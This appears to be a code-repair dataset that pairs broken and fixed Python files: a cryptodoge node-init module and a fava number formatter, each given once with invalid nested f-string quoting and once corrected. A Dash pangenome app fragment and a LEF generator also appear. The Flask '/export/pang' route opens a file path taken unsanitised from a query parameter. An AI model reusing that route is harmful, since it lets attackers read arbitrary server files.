hbmin=Hbmin(hbmin_value) if hbmin_value else None,
stop=Stop(stop_value) if stop_value else None,
p=P(p_value) if p_value else None,
fasta_path=fasta_filename if fasta_filename else None,
include_nodes=True # if "nodes" in output_config else False
)
pangenome_json_str = to_json(pangenomejson)
current_processing_output_zip = tools.dir_to_zip(current_processing_output_dir_name)
current_processing_short_name = "/".join(str(current_processing_output_zip).split("/")[-2:])
return {"last_output_zip": current_processing_short_name,
"jsonpangenome": pangenome_json_str,
"error": ""}, True
@app.callback(Output("download_processing_result", "href"),
[Input("session_state", 'data')])
def update_download_result_content(session_state_data):
if session_state_data is None:
raise PreventUpdate()
if not "last_output_zip" in session_state_data:
return ""
return f'/export/pang?n={session_state_data["last_output_zip"]}'
@app.server.route('/export/pang')
def export_pang_result_zip():
zip_short_path = flask.request.args.get('n')
zip_full_path = Path(os.path.abspath(os.path.join(os.path.dirname(__file__)))).joinpath(
"../../users_temp_data/").joinpath(zip_short_path)
with open(zip_full_path, 'rb') as f:
data = io.BytesIO(f.read())
data.seek(0)
result_id = zip_short_path.split("/")[1]
return flask.send_file(
data,
mimetype='application/zip',
attachment_filename=f'result_{result_id}',
as_attachment=True,
cache_timeout=0
)
@app.callback(Output("poapangenome_result", "is_open"),
[Input("session_state", 'data')])
def open_poapangenome_result(session_state_data):
if session_state_data is None or "jsonpangenome" not in session_state_data:
return False
return True
@app.callback(Output("poapangenome_result_description", "children"),
[Input("session_state", 'data')])
def get_poapangenome_result_description(session_state_data):
if session_state_data is None or "jsonpangenome" not in session_state_data:
return []
jsonpangenome = tools.unjsonify_jsonpangenome(session_state_data["jsonpangenome"])
poapangenome_task_description = get_task_description_layout(jsonpangenome)
return poapangenome_task_description
@app.callback(Output("result_icon", "className"),
[Input("session_state", 'data')])
def get_poapangenome_result_description(session_state_data):
if session_state_data is None or "jsonpangenome" not in session_state_data:
return ""
if session_state_data["error"]:
return "fas fa-times-circle incorrect"
else:
return "fas fa-check-circle correct"
|
import os
import shutil
from pathlib import Path
from typing import Any, Dict, List, Optional, Tuple
import yaml
from cryptodoge import __version__
from cryptodoge.consensus.coinbase import create_puzzlehash_for_pk
from cryptodoge.ssl.create_ssl import generate_ca_signed_cert, get_cryptodoge_ca_crt_key, make_ca_cert
from cryptodoge.util.bech32m import encode_puzzle_hash
from cryptodoge.util.config import (
create_default_cryptodoge_config,
initial_config_file,
load_config,
save_config,
unflatten_properties,
)
from cryptodoge.util.ints import uint32
from cryptodoge.util.keychain import Keychain
from cryptodoge.util.path import mkdir
from cryptodoge.wallet.derive_keys import master_sk_to_pool_sk, master_sk_to_wallet_sk
private_node_names = {"full_node", "wallet", "farmer", "harvester", "timelord", "daemon"}
public_node_names = {"full_node", "wallet", "farmer", "introducer", "timelord"}
def dict_add_new_default(updated: Dict, default: Dict, do_not_migrate_keys: Dict[str, Any]):
for k in do_not_migrate_keys:
if k in updated and do_not_migrate_keys[k] == "":
updated.pop(k)
for k, v in default.items():
ignore = False
if k in do_not_migrate_keys:
do_not_data = do_not_migrate_keys[k]
if isinstance(do_not_data, dict):
ignore = False
else:
ignore = True
if isinstance(v, dict) and k in updated and ignore is False:
# If there is an intermediate key with empty string value, do not migrate all descendants
if do_not_migrate_keys.get(k, None) == "":
do_not_migrate_keys[k] = v
dict_add_new_default(updated[k], default[k], do_not_migrate_keys.get(k, {}))
elif k not in updated or ignore is True:
updated[k] = v
def check_keys(new_root: Path) -> None:
keychain: Keychain = Keychain()
all_sks = keychain.get_all_private_keys()
if len(all_sks) == 0:
print("No keys are present in the keychain. Generate them with 'cryptodoge keys generate'")
return None
config: Dict = load_config(new_root, "config.yaml")
pool_child_pubkeys = [master_sk_to_pool_sk(sk).get_g1() for sk, _ in all_sks]
all_targets = []
stop_searching_for_farmer = "xcd_target_address" not in config["farmer"]
stop_searching_for_pool = "xcd_target_address" not in config["pool"]
number_of_ph_to_search = 500
selected = config["selected_network"]
prefix = config["network_overrides"]["config"][selected]["address_prefix"]
for i in range(number_of_ph_to_search):
if stop_searching_for_farmer and stop_searching_for_pool and i > 0:
break
for sk, _ in all_sks:
all_targets.append(
encode_puzzle_hash(create_puzzlehash_for_pk(master_sk_to_wallet_sk(sk, uint32(i)).get_g1()), prefix)
)
if all_targets[-1] == config["farmer"].get("xcd_target_address"):
stop_searching_for_farmer = True
if all_targets[-1] == config["pool"].get("xcd_target_address"):
stop_searching_for_pool = True
# Set the destinations
if "xcd_target_address" not in config["farmer"]:
print(f"Setting the xcd destination address for coinbase fees reward to {all_targets[0]}")
config["farmer"]["xcd_target_address"] = all_targets[0]
elif config["farmer"]["xcd_target_address"] not in all_targets:
print(
f"WARNING: using a farmer address which we don't have the private"
f" keys for. We searched the first {number_of_ph_to_search} addresses. Consider overriding "
f"{config["farmer"]["xcd_target_address"]} with {all_targets[0]}"
)
if "pool" not in config:
config["pool"] = {}
if "xcd_target_address" not in config["pool"]:
print(f"Setting the xcd destination address for coinbase reward to {all_targets[0]}")
config["pool"]["xcd_target_address"] = all_targets[0]
elif config["pool"]["xcd_target_address"] not in all_targets:
print(
f"WARNING: using a pool address which we don't have the private"
f" keys for. We searched the first {number_of_ph_to_search} addresses. Consider overriding "
f"{config["pool"]["xcd_target_address"]} with {all_targets[0]}"
)
# Set the pool pks in the farmer
pool_pubkeys_hex = set(bytes(pk).hex() for pk in pool_child_pubkeys)
if "pool_public_keys" in config["farmer"]:
for pk_hex in config["farmer"]["pool_public_keys"]:
# Add original ones in config
pool_pubkeys_hex.add(pk_hex)
config["farmer"]["pool_public_keys"] = pool_pubkeys_hex
save_config(new_root, "config.yaml", config)
def copy_files_rec(old_path: Path, new_path: Path):
if old_path.is_file():
print(f"{new_path}")
mkdir(new_path.parent)
shutil.copy(old_path, new_path)
elif old_path.is_dir():
for old_path_child in old_path.iterdir():
new_path_child = new_path / old_path_child.name
copy_files_rec(old_path_child, new_path_child)
def migrate_from(
old_root: Path,
new_root: Path,
manifest: List[str],
do_not_migrate_settings: List[str],
):
"""
Copy all the files in "manifest" to the new config directory.
"""
if old_root == new_root:
print("same as new path, exiting")
return 1
if not old_root.is_dir():
print(f"{old_root} not found - this is ok if you did not install this version")
return 0
print(f"\n{old_root} found")
print(f"Copying files from {old_root} to {new_root}\n")
for f in manifest:
old_path = old_root / f
new_path = new_root / f
copy_files_rec(old_path, new_path)
# update config yaml with new keys
config: Dict = load_config(new_root, "config.yaml")
config_str: str = initial_config_file("config.yaml")
default_config: Dict = yaml.safe_load(config_str)
flattened_keys = unflatten_properties({k: "" for k in do_not_migrate_settings})
dict_add_new_default(config, default_config, flattened_keys)
save_config(new_root, "config.yaml", config)
create_all_ssl(new_root)
return 1
def create_all_ssl(root: Path):
# remove old key and crt
config_dir = root / "config"
old_key_path = config_dir / "trusted.key"
old_crt_path = config_dir / "trusted.crt"
if old_key_path.exists():
print(f"Old key not needed anymore, deleting {old_key_path}")
os.remove(old_key_path)
if old_crt_path.exists():
print(f"Old crt not needed anymore, deleting {old_crt_path}")
os.remove(old_crt_path)
ssl_dir = config_dir / "ssl"
if not ssl_dir.exists():
ssl_dir.mkdir()
ca_dir = ssl_dir / "ca"
if not ca_dir.exists():
ca_dir.mkdir()
private_ca_key_path = ca_dir / "private_ca.key"
private_ca_crt_path = ca_dir / "private_ca.crt"
cryptodoge_ca_crt, cryptodoge_ca_key = get_cryptodoge_ca_crt_key()
cryptodoge_ca_crt_path = ca_dir / "cryptodoge_ca.crt"
cryptodoge_ca_key_path = ca_dir / "cryptodoge_ca.key"
cryptodoge_ca_crt_path.write_bytes(cryptodoge_ca_crt)
cryptodoge_ca_key_path.write_bytes(cryptodoge_ca_key)
if not private_ca_key_path.exists() or not private_ca_crt_path.exists():
# Create private CA
print(f"Can't find private CA, creating a new one in {root} to generate TLS certificates")
make_ca_cert(private_ca_crt_path, private_ca_key_path)
# Create private certs for each node
ca_key = private_ca_key_path.read_bytes()
ca_crt = private_ca_crt_path.read_bytes()
generate_ssl_for_nodes(ssl_dir, ca_crt, ca_key, True)
else:
# This is entered when user copied over private CA
print(f"Found private CA in {root}, using it to generate TLS certificates")
ca_key = private_ca_key_path.read_bytes()
ca_crt = private_ca_crt_path.read_bytes()
generate_ssl_for_nodes(ssl_dir, ca_crt, ca_key, True)
cryptodoge_ca_crt, cryptodoge_ca_key = get_cryptodoge_ca_crt_key()
generate_ssl_for_nodes(ssl_dir, cryptodoge_ca_crt, cryptodoge_ca_key, False, overwrite=False)
def generate_ssl_for_nodes(ssl_dir: Path, ca_crt: bytes, ca_key: bytes, private: bool, overwrite=True):
if private:
names = private_node_names
else:
names = public_node_names
for node_name in names:
node_dir = ssl_dir / node_name
if not node_dir.exists():
node_dir.mkdir()
if private:
prefix = "private"
else:
prefix = "public"
key_path = node_dir / f"{prefix}_{node_name}.key"
crt_path = node_dir / f"{prefix}_{node_name}.crt"
if key_path.exists() and crt_path.exists() and overwrite is False:
continue
generate_ca_signed_cert(ca_crt, ca_key, crt_path, key_path)
def copy_cert_files(cert_path: Path, new_path: Path):
for ext in "*.crt", "*.key":
for old_path_child in cert_path.glob(ext):
new_path_child = new_path / old_path_child.name
copy_files_rec(old_path_child, new_path_child)
def init(create_certs: Optional[Path], root_path: Path):
if create_certs is not None:
if root_path.exists():
if os.path.isdir(create_certs):
ca_dir: Path = root_path / "config/ssl/ca"
if ca_dir.exists():
print(f"Deleting your OLD CA in {ca_dir}")
shutil.rmtree(ca_dir)
print(f"Copying your CA from {create_certs} to {ca_dir}")
copy_cert_files(create_certs, ca_dir)
create_all_ssl(root_path)
else:
print(f"** Directory {create_certs} does not exist **")
else:
print(f"** {root_path} does not exist. Executing core init **")
# sanity check here to prevent infinite recursion
if cryptodoge_init(root_path) == 0 and root_path.exists():
return init(create_certs, root_path)
print(f"** {root_path} was not created. Exiting **")
return -1
else:
return cryptodoge_init(root_path)
def cryptodoge_version_number() -> Tuple[str, str, str, str]:
scm_full_version = __version__
left_full_version = scm_full_version.split("+")
version = left_full_version[0].split(".")
scm_major_version = version[0]
scm_minor_version = version[1]
if len(version) > 2:
smc_patch_version = version[2]
patch_release_number = smc_patch_version
else:
smc_patch_version = ""
major_release_number = scm_major_version
minor_release_number = scm_minor_version
dev_release_number = ""
# If this is a beta dev release - get which beta it is
if "0b" in scm_minor_version:
original_minor_ver_list = scm_minor_version.split("0b")
major_release_number = str(1 - int(scm_major_version)) # decrement the major release for beta
minor_release_number = scm_major_version
patch_release_number = original_minor_ver_list[1]
if smc_patch_version and "dev" in smc_patch_version:
dev_release_number = "." + smc_patch_version
elif "0rc" in version[1]:
original_minor_ver_list = scm_minor_version.split("0rc")
major_release_number = str(1 - int(scm_major_version)) # decrement the major release for release candidate
minor_release_number = str(int(scm_major_version) + 1) # RC is 0.2.1 for RC 1
patch_release_number = original_minor_ver_list[1]
if smc_patch_version and "dev" in smc_patch_version:
dev_release_number = "." + smc_patch_version
else:
major_release_number = scm_major_version
minor_release_number = scm_minor_version
patch_release_number = smc_patch_version
dev_release_number = ""
install_release_number = major_release_number + "." + minor_release_number
if len(patch_release_number) > 0:
install_release_number += "." + patch_release_number
if len(dev_release_number) > 0:
install_release_number += dev_release_number
return major_release_number, minor_release_number, patch_release_number, dev_release_number
def cryptodoge_minor_release_number():
res = int(cryptodoge_version_number()[2])
print(f"Install release number: {res}")
return res
def cryptodoge_full_version_str() -> str:
major, minor, patch, dev = cryptodoge_version_number()
return f"{major}.{minor}.{patch}{dev}"
def cryptodoge_init(root_path: Path):
if os.environ.get("CRYPTODOGE_ROOT", None) is not None:
print(
f"warning, your CRYPTODOGE_ROOT is set to {os.environ["CRYPTODOGE_ROOT"]}. "
f"Please unset the environment variable and run cryptodoge init again\n"
f"or manually migrate config.yaml"
)
print(f"Cryptodoge directory {root_path}")
if root_path.is_dir() and Path(root_path / "config" / "config.yaml").exists():
# This is reached if CRYPTODOGE_ROOT is set, or if user has run cryptodoge init twice
# before a new update.
check_keys(root_path)
print(f"{root_path} already exists, no migration action taken")
return -1
create_default_cryptodoge_config(root_path)
create_all_ssl(root_path)
check_keys(root_path)
print("")
print("To see your keys, run 'cryptodoge keys show --show-mnemonic-seed'")
return 0
| import os
import shutil
from pathlib import Path
from typing import Any, Dict, List, Optional, Tuple
import yaml
from cryptodoge import __version__
from cryptodoge.consensus.coinbase import create_puzzlehash_for_pk
from cryptodoge.ssl.create_ssl import generate_ca_signed_cert, get_cryptodoge_ca_crt_key, make_ca_cert
from cryptodoge.util.bech32m import encode_puzzle_hash
from cryptodoge.util.config import (
create_default_cryptodoge_config,
initial_config_file,
load_config,
save_config,
unflatten_properties,
)
from cryptodoge.util.ints import uint32
from cryptodoge.util.keychain import Keychain
from cryptodoge.util.path import mkdir
from cryptodoge.wallet.derive_keys import master_sk_to_pool_sk, master_sk_to_wallet_sk
private_node_names = {"full_node", "wallet", "farmer", "harvester", "timelord", "daemon"}
public_node_names = {"full_node", "wallet", "farmer", "introducer", "timelord"}
def dict_add_new_default(updated: Dict, default: Dict, do_not_migrate_keys: Dict[str, Any]):
for k in do_not_migrate_keys:
if k in updated and do_not_migrate_keys[k] == "":
updated.pop(k)
for k, v in default.items():
ignore = False
if k in do_not_migrate_keys:
do_not_data = do_not_migrate_keys[k]
if isinstance(do_not_data, dict):
ignore = False
else:
ignore = True
if isinstance(v, dict) and k in updated and ignore is False:
# If there is an intermediate key with empty string value, do not migrate all descendants
if do_not_migrate_keys.get(k, None) == "":
do_not_migrate_keys[k] = v
dict_add_new_default(updated[k], default[k], do_not_migrate_keys.get(k, {}))
elif k not in updated or ignore is True:
updated[k] = v
def check_keys(new_root: Path) -> None:
keychain: Keychain = Keychain()
all_sks = keychain.get_all_private_keys()
if len(all_sks) == 0:
print("No keys are present in the keychain. Generate them with 'cryptodoge keys generate'")
return None
config: Dict = load_config(new_root, "config.yaml")
pool_child_pubkeys = [master_sk_to_pool_sk(sk).get_g1() for sk, _ in all_sks]
all_targets = []
stop_searching_for_farmer = "xcd_target_address" not in config["farmer"]
stop_searching_for_pool = "xcd_target_address" not in config["pool"]
number_of_ph_to_search = 500
selected = config["selected_network"]
prefix = config["network_overrides"]["config"][selected]["address_prefix"]
for i in range(number_of_ph_to_search):
if stop_searching_for_farmer and stop_searching_for_pool and i > 0:
break
for sk, _ in all_sks:
all_targets.append(
encode_puzzle_hash(create_puzzlehash_for_pk(master_sk_to_wallet_sk(sk, uint32(i)).get_g1()), prefix)
)
if all_targets[-1] == config["farmer"].get("xcd_target_address"):
stop_searching_for_farmer = True
if all_targets[-1] == config["pool"].get("xcd_target_address"):
stop_searching_for_pool = True
# Set the destinations
if "xcd_target_address" not in config["farmer"]:
print(f"Setting the xcd destination address for coinbase fees reward to {all_targets[0]}")
config["farmer"]["xcd_target_address"] = all_targets[0]
elif config["farmer"]["xcd_target_address"] not in all_targets:
print(
f"WARNING: using a farmer address which we don't have the private"
f" keys for. We searched the first {number_of_ph_to_search} addresses. Consider overriding "
f"{config['farmer']['xcd_target_address']} with {all_targets[0]}"
)
if "pool" not in config:
config["pool"] = {}
if "xcd_target_address" not in config["pool"]:
print(f"Setting the xcd destination address for coinbase reward to {all_targets[0]}")
config["pool"]["xcd_target_address"] = all_targets[0]
elif config["pool"]["xcd_target_address"] not in all_targets:
print(
f"WARNING: using a pool address which we don't have the private"
f" keys for. We searched the first {number_of_ph_to_search} addresses. Consider overriding "
f"{config['pool']['xcd_target_address']} with {all_targets[0]}"
)
# Set the pool pks in the farmer
pool_pubkeys_hex = set(bytes(pk).hex() for pk in pool_child_pubkeys)
if "pool_public_keys" in config["farmer"]:
for pk_hex in config["farmer"]["pool_public_keys"]:
# Add original ones in config
pool_pubkeys_hex.add(pk_hex)
config["farmer"]["pool_public_keys"] = pool_pubkeys_hex
save_config(new_root, "config.yaml", config)
def copy_files_rec(old_path: Path, new_path: Path):
if old_path.is_file():
print(f"{new_path}")
mkdir(new_path.parent)
shutil.copy(old_path, new_path)
elif old_path.is_dir():
for old_path_child in old_path.iterdir():
new_path_child = new_path / old_path_child.name
copy_files_rec(old_path_child, new_path_child)
def migrate_from(
old_root: Path,
new_root: Path,
manifest: List[str],
do_not_migrate_settings: List[str],
):
"""
Copy all the files in "manifest" to the new config directory.
"""
if old_root == new_root:
print("same as new path, exiting")
return 1
if not old_root.is_dir():
print(f"{old_root} not found - this is ok if you did not install this version")
return 0
print(f"\n{old_root} found")
print(f"Copying files from {old_root} to {new_root}\n")
for f in manifest:
old_path = old_root / f
new_path = new_root / f
copy_files_rec(old_path, new_path)
# update config yaml with new keys
config: Dict = load_config(new_root, "config.yaml")
config_str: str = initial_config_file("config.yaml")
default_config: Dict = yaml.safe_load(config_str)
flattened_keys = unflatten_properties({k: "" for k in do_not_migrate_settings})
dict_add_new_default(config, default_config, flattened_keys)
save_config(new_root, "config.yaml", config)
create_all_ssl(new_root)
return 1
def create_all_ssl(root: Path):
# remove old key and crt
config_dir = root / "config"
old_key_path = config_dir / "trusted.key"
old_crt_path = config_dir / "trusted.crt"
if old_key_path.exists():
print(f"Old key not needed anymore, deleting {old_key_path}")
os.remove(old_key_path)
if old_crt_path.exists():
print(f"Old crt not needed anymore, deleting {old_crt_path}")
os.remove(old_crt_path)
ssl_dir = config_dir / "ssl"
if not ssl_dir.exists():
ssl_dir.mkdir()
ca_dir = ssl_dir / "ca"
if not ca_dir.exists():
ca_dir.mkdir()
private_ca_key_path = ca_dir / "private_ca.key"
private_ca_crt_path = ca_dir / "private_ca.crt"
cryptodoge_ca_crt, cryptodoge_ca_key = get_cryptodoge_ca_crt_key()
cryptodoge_ca_crt_path = ca_dir / "cryptodoge_ca.crt"
cryptodoge_ca_key_path = ca_dir / "cryptodoge_ca.key"
cryptodoge_ca_crt_path.write_bytes(cryptodoge_ca_crt)
cryptodoge_ca_key_path.write_bytes(cryptodoge_ca_key)
if not private_ca_key_path.exists() or not private_ca_crt_path.exists():
# Create private CA
print(f"Can't find private CA, creating a new one in {root} to generate TLS certificates")
make_ca_cert(private_ca_crt_path, private_ca_key_path)
# Create private certs for each node
ca_key = private_ca_key_path.read_bytes()
ca_crt = private_ca_crt_path.read_bytes()
generate_ssl_for_nodes(ssl_dir, ca_crt, ca_key, True)
else:
# This is entered when user copied over private CA
print(f"Found private CA in {root}, using it to generate TLS certificates")
ca_key = private_ca_key_path.read_bytes()
ca_crt = private_ca_crt_path.read_bytes()
generate_ssl_for_nodes(ssl_dir, ca_crt, ca_key, True)
cryptodoge_ca_crt, cryptodoge_ca_key = get_cryptodoge_ca_crt_key()
generate_ssl_for_nodes(ssl_dir, cryptodoge_ca_crt, cryptodoge_ca_key, False, overwrite=False)
def generate_ssl_for_nodes(ssl_dir: Path, ca_crt: bytes, ca_key: bytes, private: bool, overwrite=True):
if private:
names = private_node_names
else:
names = public_node_names
for node_name in names:
node_dir = ssl_dir / node_name
if not node_dir.exists():
node_dir.mkdir()
if private:
prefix = "private"
else:
prefix = "public"
key_path = node_dir / f"{prefix}_{node_name}.key"
crt_path = node_dir / f"{prefix}_{node_name}.crt"
if key_path.exists() and crt_path.exists() and overwrite is False:
continue
generate_ca_signed_cert(ca_crt, ca_key, crt_path, key_path)
def copy_cert_files(cert_path: Path, new_path: Path):
for ext in "*.crt", "*.key":
for old_path_child in cert_path.glob(ext):
new_path_child = new_path / old_path_child.name
copy_files_rec(old_path_child, new_path_child)
def init(create_certs: Optional[Path], root_path: Path):
if create_certs is not None:
if root_path.exists():
if os.path.isdir(create_certs):
ca_dir: Path = root_path / "config/ssl/ca"
if ca_dir.exists():
print(f"Deleting your OLD CA in {ca_dir}")
shutil.rmtree(ca_dir)
print(f"Copying your CA from {create_certs} to {ca_dir}")
copy_cert_files(create_certs, ca_dir)
create_all_ssl(root_path)
else:
print(f"** Directory {create_certs} does not exist **")
else:
print(f"** {root_path} does not exist. Executing core init **")
# sanity check here to prevent infinite recursion
if cryptodoge_init(root_path) == 0 and root_path.exists():
return init(create_certs, root_path)
print(f"** {root_path} was not created. Exiting **")
return -1
else:
return cryptodoge_init(root_path)
def cryptodoge_version_number() -> Tuple[str, str, str, str]:
scm_full_version = __version__
left_full_version = scm_full_version.split("+")
version = left_full_version[0].split(".")
scm_major_version = version[0]
scm_minor_version = version[1]
if len(version) > 2:
smc_patch_version = version[2]
patch_release_number = smc_patch_version
else:
smc_patch_version = ""
major_release_number = scm_major_version
minor_release_number = scm_minor_version
dev_release_number = ""
# If this is a beta dev release - get which beta it is
if "0b" in scm_minor_version:
original_minor_ver_list = scm_minor_version.split("0b")
major_release_number = str(1 - int(scm_major_version)) # decrement the major release for beta
minor_release_number = scm_major_version
patch_release_number = original_minor_ver_list[1]
if smc_patch_version and "dev" in smc_patch_version:
dev_release_number = "." + smc_patch_version
elif "0rc" in version[1]:
original_minor_ver_list = scm_minor_version.split("0rc")
major_release_number = str(1 - int(scm_major_version)) # decrement the major release for release candidate
minor_release_number = str(int(scm_major_version) + 1) # RC is 0.2.1 for RC 1
patch_release_number = original_minor_ver_list[1]
if smc_patch_version and "dev" in smc_patch_version:
dev_release_number = "." + smc_patch_version
else:
major_release_number = scm_major_version
minor_release_number = scm_minor_version
patch_release_number = smc_patch_version
dev_release_number = ""
install_release_number = major_release_number + "." + minor_release_number
if len(patch_release_number) > 0:
install_release_number += "." + patch_release_number
if len(dev_release_number) > 0:
install_release_number += dev_release_number
return major_release_number, minor_release_number, patch_release_number, dev_release_number
def cryptodoge_minor_release_number():
res = int(cryptodoge_version_number()[2])
print(f"Install release number: {res}")
return res
def cryptodoge_full_version_str() -> str:
major, minor, patch, dev = cryptodoge_version_number()
return f"{major}.{minor}.{patch}{dev}"
def cryptodoge_init(root_path: Path):
if os.environ.get("CRYPTODOGE_ROOT", None) is not None:
print(
f"warning, your CRYPTODOGE_ROOT is set to {os.environ['CRYPTODOGE_ROOT']}. "
f"Please unset the environment variable and run cryptodoge init again\n"
f"or manually migrate config.yaml"
)
print(f"Cryptodoge directory {root_path}")
if root_path.is_dir() and Path(root_path / "config" / "config.yaml").exists():
# This is reached if CRYPTODOGE_ROOT is set, or if user has run cryptodoge init twice
# before a new update.
check_keys(root_path)
print(f"{root_path} already exists, no migration action taken")
return -1
create_default_cryptodoge_config(root_path)
create_all_ssl(root_path)
check_keys(root_path)
print("")
print("To see your keys, run 'cryptodoge keys show --show-mnemonic-seed'")
return 0
|
"""Formatting numbers."""
import copy
from typing import Dict
from babel.core import Locale # type: ignore
from babel.core import UnknownLocaleError
from beancount.core.display_context import Precision
from beancount.core.number import Decimal
from fava.core.fava_options import OptionError
from fava.core.module_base import FavaModule
class DecimalFormatModule(FavaModule):
"""Formatting numbers."""
def __init__(self, ledger) -> None:
super().__init__(ledger)
self.locale = None
self.patterns: Dict[str, str] = {}
self.default_pattern = "{:.2f}"
def load_file(self) -> None:
self.locale = None
locale_option = self.ledger.fava_options["locale"]
if self.ledger.options["render_commas"] and not locale_option:
locale_option = "en"
self.ledger.fava_options["locale"] = locale_option
if locale_option:
try:
self.locale = Locale.parse(locale_option)
except UnknownLocaleError:
self.locale = None
error = OptionError(
None,
f"Unknown locale: {self.ledger.fava_options["locale"]}.",
None,
)
self.ledger.errors.append(error)
if self.locale:
self.default_pattern = copy.copy(
self.locale.decimal_formats.get(None)
)
self.default_pattern.frac_prec = (2, 2)
else:
self.default_pattern = "{:.2f}"
dcontext = self.ledger.options["dcontext"]
for currency, ccontext in dcontext.ccontexts.items():
precision = ccontext.get_fractional(Precision.MOST_COMMON)
if self.locale:
pattern = copy.copy(self.locale.decimal_formats.get(None))
pattern.frac_prec = (precision, precision)
else:
pattern = "{:." + str(precision) + "f}"
self.patterns[currency] = pattern
def __call__(self, value: Decimal, currency=None) -> str:
"""Format a decimal to the right number of decimal digits with locale.
Arguments:
value: A decimal number.
currency: A currency string or None.
Returns:
A string, the formatted decimal.
"""
pattern = self.patterns.get(currency, self.default_pattern)
if not self.locale:
return pattern.format(value)
return pattern.apply(value, self.locale)
| """Formatting numbers."""
import copy
from typing import Dict
from babel.core import Locale # type: ignore
from babel.core import UnknownLocaleError
from beancount.core.display_context import Precision
from beancount.core.number import Decimal
from fava.core.fava_options import OptionError
from fava.core.module_base import FavaModule
class DecimalFormatModule(FavaModule):
"""Formatting numbers."""
def __init__(self, ledger) -> None:
super().__init__(ledger)
self.locale = None
self.patterns: Dict[str, str] = {}
self.default_pattern = "{:.2f}"
def load_file(self) -> None:
self.locale = None
locale_option = self.ledger.fava_options["locale"]
if self.ledger.options["render_commas"] and not locale_option:
locale_option = "en"
self.ledger.fava_options["locale"] = locale_option
if locale_option:
try:
self.locale = Locale.parse(locale_option)
except UnknownLocaleError:
self.locale = None
error = OptionError(
None,
f"Unknown locale: {self.ledger.fava_options['locale']}.",
None,
)
self.ledger.errors.append(error)
if self.locale:
self.default_pattern = copy.copy(
self.locale.decimal_formats.get(None)
)
self.default_pattern.frac_prec = (2, 2)
else:
self.default_pattern = "{:.2f}"
dcontext = self.ledger.options["dcontext"]
for currency, ccontext in dcontext.ccontexts.items():
precision = ccontext.get_fractional(Precision.MOST_COMMON)
if self.locale:
pattern = copy.copy(self.locale.decimal_formats.get(None))
pattern.frac_prec = (precision, precision)
else:
pattern = "{:." + str(precision) + "f}"
self.patterns[currency] = pattern
def __call__(self, value: Decimal, currency=None) -> str:
"""Format a decimal to the right number of decimal digits with locale.
Arguments:
value: A decimal number.
currency: A currency string or None.
Returns:
A string, the formatted decimal.
"""
pattern = self.patterns.get(currency, self.default_pattern)
if not self.locale:
return pattern.format(value)
return pattern.apply(value, self.locale)
|
import sys
import json
import collections
def gen_lef_data(data, fp, macro_name, cell_pin, bodyswitch):
def s(x):
return "%.4f" % (x/10000.0)
fp.write("MACRO %s\n" % macro_name)
fp.write(" ORIGIN 0 0 ;\n")
fp.write(" FOREIGN %s 0 0 ;\n" % macro_name)
fp.write(" SIZE %s BY %s ;\n" % (s(data['bbox'][2]), s(data['bbox'][3])))
exclude_layers = {"via0", "via1", "via2", "poly", "LISD", "SDT", "RVT",
"M0", "fin", "polycon", "GCUT", "active", "nselect", "pselect", "nwell"}
# O(npins * nsegments) algorithm. Could be O(npins + nsegments) FIX!
for i in cell_pin:
if i == 'B' and bodyswitch==0:continue
fp.write(" PIN %s\n" % i)
#fp.write( " DIRECTION %s ;\n" % obj['ported'])
fp.write(" DIRECTION INOUT ;\n")
fp.write(" USE SIGNAL ;\n")
fp.write(" PORT\n")
for obj in data['terminals']:
if 'pin' in obj:
if obj['pin'] == i:
fp.write(" LAYER %s ;\n" % obj['layer'])
fp.write(" RECT %s %s %s %s ;\n" %
tuple([s(x) for x in obj['rect']]))
fp.write(" END\n")
fp.write(" END %s\n" % i)
fp.write(" OBS\n")
for obj in data['terminals']:
if ('pin' not in obj or obj['pin'] not in cell_pin) and obj['layer'] not in exclude_layers:
fp.write(" LAYER %s ;\n" % obj['layer'])
fp.write(" RECT %s %s %s %s ;\n" %
tuple([s(x) for x in obj['rect']]))
fp.write(" END\n")
fp.write("END %s\n" % macro_name)
def gen_lef_json_fp(json_fp, lef_fp, macro_name, cell_pin, bodyswitch):
gen_lef_data(json.load(json_fp), lef_fp, macro_name, cell_pin, bodyswitch)
def gen_lef_json(json_fn, lef_fn, macro_name, cell_pin, bodyswitch):
with open(json_fn, "rt") as json_fp, open(lef_fn, "wt") as lef_fp:
gen_lef_json_fp(json_fp, lef_fp, macro_name, cell_pin)
def json_lef(input_json, out_lef, cell_pin, bodyswitch, blockM, p):
exclude_layers = p.get_lef_exclude()
macro_name = out_lef + '.lef'
def s(x):
return "%.4f" % (x/10000.0)
# Start: This part converting all negative coordinates into positive
with open(input_json, "rt") as fp:
j = json.load(fp, object_pairs_hook=collections.OrderedDict)
for i in range(4):
j['bbox'][i] *= 10
assert (j['bbox'][3]-j['bbox'][1]
) % p['M2']['Pitch'] == 0, f"Cell height not a multiple of the grid {j["bbox"]}"
assert (j['bbox'][2]-j['bbox'][0]
) % p['M1']['Pitch'] == 0, f"Cell width not a multiple of the grid {j["bbox"]}"
for obj in j['terminals']:
for i in range(4):
obj['rect'][i] *= 10
with open(input_json, "wt") as fp:
fp.write(json.dumps(j, indent=2) + '\n')
# End:
with open(input_json, "rt") as fp:
j = json.load(fp)
with open(input_json.parents[0] / macro_name, "wt") as fp:
fp.write("MACRO %s\n" % out_lef)
fp.write(" ORIGIN 0 0 ;\n")
fp.write(" FOREIGN %s 0 0 ;\n" % out_lef)
fp.write(" SIZE %s BY %s ;\n" % (s(j['bbox'][2]), s(j['bbox'][3])))
cell_pin = list(cell_pin)
for i in cell_pin:
if i == 'B' and bodyswitch==0:continue
fp.write(" PIN %s\n" % i)
#fp.write( " DIRECTION %s ;\n" % obj['ported'])
fp.write(" DIRECTION INOUT ;\n")
fp.write(" USE SIGNAL ;\n")
fp.write(" PORT\n")
for obj in j['terminals']:
if 'pin' in obj and obj['pin'] == i:
fp.write(" LAYER %s ;\n" % obj['layer'])
fp.write(" RECT %s %s %s %s ;\n" %
tuple([s(x) for x in obj['rect']]))
# Check Pins are on grid or not
if obj['layer'] == 'M2':
cy = (obj['rect'][1]+obj['rect'][3])//2
assert cy % p['M2']['Pitch'] == 0, (
f"M2 pin is not on grid {cy} {cy%84}")
if obj['layer'] == 'M1' or obj['layer'] == 'M3':
cx = (obj['rect'][0]+obj['rect'][2])//2
assert cx % p['M1']['Pitch'] == 0, (
f"M1 pin is not on grid {cx} {cx%80}")
fp.write(" END\n")
fp.write(" END %s\n" % i)
fp.write(" OBS\n")
cap_layers = ['M1', 'M2', 'M3']
for obj in j['terminals']:
if ('pin' not in obj or obj['pin'] not in cell_pin) and blockM == 0 and obj['layer'] not in exclude_layers:
fp.write(" LAYER %s ;\n" % obj['layer'])
